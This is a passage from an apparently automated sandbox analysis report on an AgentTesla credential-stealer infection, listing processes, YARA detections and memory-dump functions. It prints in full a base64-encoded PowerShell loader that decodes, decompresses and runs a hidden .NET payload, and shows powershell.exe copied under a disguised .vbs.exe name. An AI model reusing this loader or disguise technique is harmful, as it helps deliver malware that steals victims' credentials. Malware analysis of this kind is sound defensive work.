JABOAHAAZQBnAHcAYgBpAGQAaABzAGIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAVAB5AHUAbQBpAHIAbQB1AGUAeABwACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQATgBwAGUAZwB3AGIAaQBkAGgAcwBiACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABUAHkAdQBtAGkAcgBtAHUAZQB4AHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACAAKQA7ACQATwBzAHYAZgB6AGUAcwB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABDAHAAYgB5AG4AcABuAHYAawB6ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAQwBwAGIAeQBuAHAAbgB2AGsAegAuAEMAbwBwAHkAVABvACgAIAAkAE8AcwB2AGYAegBlAHMAeQAgACkAOwAkAEMAcABiAHkAbgBwAG4AdgBrAHoALgBDAGwAbwBzAGUAKAApADsAJABOAGgAeQBuAGsAdABqAHEAYgB4AHoALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABJAGEAdwB3AHEAZgB3AG8AYgBnAG0AIAA9ACAAJABPAHMAdgBmAHoAZQBzAHkALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQApADsAIAAkAFQAcQBvAGgAbwBqAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoARwBlAHQARABvAG0AYQBpAG4AKAApAC4ATABvAGEAZAAoACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACkAOwAgACQARABjAGIAagB3ACAAPQAgACQAVABxAG8AaABvAGoAdAAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAYwBiAGoAdwAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABjAGIAagB3AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==
Imagebase:	0xfa0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.1826048425.00000000056E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.1890962088.00000000064DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1890962088.00000000064DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1890962088.00000000064DC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.1826048425.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.1826048425.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 0%, Virustotal, Browse
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	01:48:29
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	01:48:34
Start date:	02/09/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs"
Imagebase:	0x7ff6fe0f0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	01:48:35
Start date:	02/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe" /Y
Imagebase:	0x7ff6e3ca0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	01:48:35
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	01:48:36
Start date:	02/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0xbd0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.1871888281.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.1871888281.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.1871888281.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	01:48:38
Start date:	02/09/2024
Path:	C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe" -enc JABOAHAAZQBnAHcAYgBpAGQAaABzAGIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAVAB5AHUAbQBpAHIAbQB1AGUAeABwACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQATgBwAGUAZwB3AGIAaQBkAGgAcwBiACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABUAHkAdQBtAGkAcgBtAHUAZQB4AHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACAAKQA7ACQATwBzAHYAZgB6AGUAcwB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABDAHAAYgB5AG4AcABuAHYAawB6ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAQwBwAGIAeQBuAHAAbgB2AGsAegAuAEMAbwBwAHkAVABvACgAIAAkAE8AcwB2AGYAegBlAHMAeQAgACkAOwAkAEMAcABiAHkAbgBwAG4AdgBrAHoALgBDAGwAbwBzAGUAKAApADsAJABOAGgAeQBuAGsAdABqAHEAYgB4AHoALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABJAGEAdwB3AHEAZgB3AG8AYgBnAG0AIAA9ACAAJABPAHMAdgBmAHoAZQBzAHkALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQApADsAIAAkAFQAcQBvAGgAbwBqAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoARwBlAHQARABvAG0AYQBpAG4AKAApAC4ATABvAGEAZAAoACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACkAOwAgACQARABjAGIAagB3ACAAPQAgACQAVABxAG8AaABvAGoAdAAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAYwBiAGoAdwAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABjAGIAagB3AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==
Imagebase:	0xfa0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000013.00000002.1916609036.000000000584C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.1916609036.000000000584C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.1916609036.000000000584C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000013.00000002.1873959182.0000000004A59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.1873959182.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000013.00000002.1873959182.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	01:48:38
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	01:48:43
Start date:	02/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Imagebase:	0xba0000
File size:	42'064 bytes
MD5 hash:	5D4073B2EB6D217C19F2B22F21BF8D57
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000015.00000002.2715317704.0000000003036000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000015.00000002.2715317704.0000000003071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000015.00000002.2715317704.000000000304E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10.9%
Dynamic/Decrypted Code Coverage:	96.4%
Signature Coverage:	15.3%
Total number of Nodes:	308
Total number of Limit Nodes:	17

Executed Functions

Function 07471400 Relevance: 3.8, Instructions: 3825COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1619638640.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7470000_DOCUMENTS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e2687ae8ee72253595708b5fef5a8c87672271f60573b145b23d71ecfbc6197
Instruction ID: 3d949bcec6cf64cb83eeaf9dd27f60e39a0db2116d464438e2dc308191257d76
Opcode Fuzzy Hash: 9e2687ae8ee72253595708b5fef5a8c87672271f60573b145b23d71ecfbc6197
Instruction Fuzzy Hash: 8D53F5B0A09389DFDB16CBB8C8557EA7FB1EF86200F1444ABD445EB392C7749845CB62

Function 08F0AF68 Relevance: 3.0, Strings: 2, Instructions: 542
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

.-/, xrefs: 08F0B3A7
8, xrefs: 08F0B074

Memory Dump Source

Source File: 00000004.00000002.1624600435.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f00000_DOCUMENTS.jbxd

Similarity

API ID:
String ID: .-/$8
API String ID: 0-1473384289
Opcode ID: c1ffad9a5f7979fa3761474a1ff4be632f408792254586c67fdbb115d2ef9336
Instruction ID: 0d4dd33265c1f4bb583af1f4f357912ed4a0d53944e429673c8314ba71d37bc6
Opcode Fuzzy Hash: c1ffad9a5f7979fa3761474a1ff4be632f408792254586c67fdbb115d2ef9336
Instruction Fuzzy Hash: 2D42B475D006298FDB64CF69C850AD9BBB2BF89310F5486EAD50DA7351DB30AE81CF90

Function 0812B8B8 Relevance: 2.3, Strings: 1, Instructions: 1081
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

2, xrefs: 0812C3F8

Memory Dump Source

Source File: 00000004.00000002.1621634587.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8120000_DOCUMENTS.jbxd

Similarity

API ID:
String ID: 2
API String ID: 0-450215437
Opcode ID: fb61c947f731000328f6edd0e03a815ab6bb51620e4304e4d2cb819c26aabdce
Instruction ID: 3bae42fd4c11b814ae26792a3ac9c92a7be4d4ec9bd44c51819eb096354f7eb2
Opcode Fuzzy Hash: fb61c947f731000328f6edd0e03a815ab6bb51620e4304e4d2cb819c26aabdce
Instruction Fuzzy Hash: 9BC2A0B4A00228CFDB64DF69C984A9DBBB6FF89304F1081E9D509A7355DB30AE85CF50

Function 08F0DE38 Relevance: 1.6, APIs: 1, Instructions: 112nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 08F0DEF5

Memory Dump Source

Source File: 00000004.00000002.1624600435.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f00000_DOCUMENTS.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 4bf00ec4ffcce0fa92d276608ce373f12e5a3d4f3c8648277626111a772aebe5
Instruction ID: c11b298928d5994bd1ad0bc7b19c3a35a05d4a670a41379d4c4c0a432d4fa087
Opcode Fuzzy Hash: 4bf00ec4ffcce0fa92d276608ce373f12e5a3d4f3c8648277626111a772aebe5
Instruction Fuzzy Hash: 9C41A8B5D012489FDF10DFEAD884ADEFBB1BB49320F10942AE815B7210C735A942CF64

Function 08F0DE40 Relevance: 1.6, APIs: 1, Instructions: 105nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 08F0DEF5

Memory Dump Source

Source File: 00000004.00000002.1624600435.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f00000_DOCUMENTS.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 4f62584ede23786f1d5232b69d729444384d0b99abd7c32d6eb9883167ed8352
Instruction ID: 2007e8cd3bb5e159b79eff643a3ed5388016c4d7d64c3329204c53c9e89a5106
Opcode Fuzzy Hash: 4f62584ede23786f1d5232b69d729444384d0b99abd7c32d6eb9883167ed8352
Instruction Fuzzy Hash: F84187B9D002589FCF10DFAAD980ADEFBB1BB49320F10942AE815B7310D735A941CF68

Function 08F0F328 Relevance: 1.6, APIs: 1, Instructions: 86nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 08F0F3BE

Memory Dump Source

Source File: 00000004.00000002.1624600435.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f00000_DOCUMENTS.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 4bd20b9ea207b826f0444695d8e8d171b9f7911462b2f2fe6c1ba9d11c588c92
Instruction ID: 0922b3c839013cd77ac074be4d2f4b516c3e59f382cb2f4d00720bd2a3908dfe
Opcode Fuzzy Hash: 4bd20b9ea207b826f0444695d8e8d171b9f7911462b2f2fe6c1ba9d11c588c92
Instruction Fuzzy Hash: 4931BAB9D012589FCB10CFAAD984ADEFBF1AB49320F10942AE805B7240C775A945CFA4

Function 08F0F330 Relevance: 1.6, APIs: 1, Instructions: 82nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 08F0F3BE

Memory Dump Source

Source File: 00000004.00000002.1624600435.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f00000_DOCUMENTS.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 95222d29cce7a2b57726f8329670bb0e351c1123412d1057b200919c3d53e158
Instruction ID: b080f1adce24c4a16a8bf660b50ae19cf6b6c02451202dc26e31ddb0ea5ace24
Opcode Fuzzy Hash: 95222d29cce7a2b57726f8329670bb0e351c1123412d1057b200919c3d53e158
Instruction Fuzzy Hash: 2931AAB5D012589FCB10CFAAD984ADEFBF5FB49320F10942AE815B7240C779A945CFA4

Function 08F19470 Relevance: 1.5, Strings: 1, Instructions: 250COMMON

Download Yara Rule

Strings

B5M, xrefs: 08F1968D

Memory Dump Source

Source File: 00000004.00000002.1624660312.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f10000_DOCUMENTS.jbxd

Similarity

API ID:
String ID: B5M
API String ID: 0-2206939305
Opcode ID: 66c5bd40b5841c5916bf89f29d7d08678790983eda0259d2e9b0362517c034d7
Instruction ID: c2c6fb64e4448ba24c73c382d2e2124508ea9371cd49c79d8981d460ca7cab1e
Opcode Fuzzy Hash: 66c5bd40b5841c5916bf89f29d7d08678790983eda0259d2e9b0362517c034d7
Instruction Fuzzy Hash: 52B1D0B1E11218CFDF14CFA9D894BADBBF2FB49305FA0906AD409A7251DBB45986CF40

Function 08F19461 Relevance: 1.5, Strings: 1, Instructions: 247COMMON

Download Yara Rule

Strings

B5M, xrefs: 08F1968D

Memory Dump Source

Source File: 00000004.00000002.1624660312.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f10000_DOCUMENTS.jbxd

Similarity

API ID:
String ID: B5M
API String ID: 0-2206939305
Opcode ID: d5a858186b2315ae7685f76e55319603fde6b0c4526474a420f0de668ac5fcde
Instruction ID: 345fdc40094b53d8cf2ed7afd6348a14a1f30641254da9c2b8b0c8b81bcfd17f
Opcode Fuzzy Hash: d5a858186b2315ae7685f76e55319603fde6b0c4526474a420f0de668ac5fcde
Instruction Fuzzy Hash: A2B1FFB1E11218CFDF14CFA9D894BADBBF2FB49305F64906AD409A7251DBB05986CF40

Function 08F0AF58 Relevance: 1.4, Strings: 1, Instructions: 156COMMON

Download Yara Rule

Strings

h, xrefs: 08F0B068

Memory Dump Source

Source File: 00000004.00000002.1624600435.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f00000_DOCUMENTS.jbxd

Similarity

API ID:
String ID: h
API String ID: 0-2439710439
Opcode ID: 4fc212f82626a01f12a62a67ff40adc429902132091b39c73c8d7e971bafa1f9
Instruction ID: f74eab79e9945fb679dd5442e681c715dfbd3a43bf9b64d126a32d56a0e55cd7
Opcode Fuzzy Hash: 4fc212f82626a01f12a62a67ff40adc429902132091b39c73c8d7e971bafa1f9
Instruction Fuzzy Hash: E461C471D006288FEB64CF6AC8507D9FBB2BF89311F54C2AAC50DA7254DB305A85CF60

Function 0812A608 Relevance: 1.0, Instructions: 956COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1621634587.0000000008120000.00000040.00000800.00020000.00000000.sdmp, Offset: 08120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8120000_DOCUMENTS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1d0822a5067623c7ad6297b7640ec347a174342afd69b50e5a5465c8d9e6ffc
Instruction ID: f17a4507dac729b986b6bd148ef85231459661be3f09fd0e13e6a277c3e5ade3
Opcode Fuzzy Hash: f1d0822a5067623c7ad6297b7640ec347a174342afd69b50e5a5465c8d9e6ffc
Instruction Fuzzy Hash: 87A2A475A00228CFDB65CF69C984A9DBBB2FF89305F1581E9D509AB321DB319E91CF40

Function 08F019D0 Relevance: .7, Instructions: 651COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1624600435.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f00000_DOCUMENTS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88abca284dba47206ba9e333926ac855931a3b65698adbdcf38b42c16f7a1e19
Instruction ID: 8f80de2592c40c938de781141caf52c28c58db91bef7cffe754f20cd2134ee3d
Opcode Fuzzy Hash: 88abca284dba47206ba9e333926ac855931a3b65698adbdcf38b42c16f7a1e19
Instruction Fuzzy Hash: BF4267B0A002158FDB1ADFB9C49866EBBF2FF88301F24852DD51AD7385DB30A945DB91

Function 08E7F138 Relevance: .4, Instructions: 352COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1623893189.0000000008E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8e70000_DOCUMENTS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b37c6e50776909c4a8c321a5937495a541521e2c44d67cce35fe565918587c35
Instruction ID: 4b2811820ff1060cb2f0fc104fa22b5638db03eee80f2d9cba24672d41a1f3ab
Opcode Fuzzy Hash: b37c6e50776909c4a8c321a5937495a541521e2c44d67cce35fe565918587c35
Instruction Fuzzy Hash: 0BF10371E15219CFDB64CF69D884BA9BBF2FB89305F20A1AAD40DA7256DB305D85CF00

Function 08F115C0 Relevance: .3, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1624660312.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f10000_DOCUMENTS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7aa1c8a4a833c12684d530ba8c8bb42f0ec71b55fa2a11b451d8192c99b4a4a8
Instruction ID: 75be4fa8f0a2436a0dfb878a554f22180a8bdfda58c34ef8d9d288e831f4079a
Opcode Fuzzy Hash: 7aa1c8a4a833c12684d530ba8c8bb42f0ec71b55fa2a11b451d8192c99b4a4a8
Instruction Fuzzy Hash: 8ED126B5E12218CFDF14CFA9C944BADBBF2FB49305F24A0A9D509A7281DB355985CF01

Function 08F115D0 Relevance: .3, Instructions: 309COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1624660312.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f10000_DOCUMENTS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46c6bec68bff6cff26cbd04346203590ef578abac96a1e72e5e2079c1cce5f6f
Instruction ID: 2b424c60e63a20208fd52123c933a29c7c42fd821a4e552a449d37f81a71b298
Opcode Fuzzy Hash: 46c6bec68bff6cff26cbd04346203590ef578abac96a1e72e5e2079c1cce5f6f
Instruction Fuzzy Hash: 76D125B1E12218CFDF14CFA9C984BADBBF2FB49305F24A0A9D509A7281DB355985CF01

Function 08F1BE60 Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1624660312.0000000008F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8f10000_DOCUMENTS.jbxd

Similarity

API ID:
String ID:
API String ID:
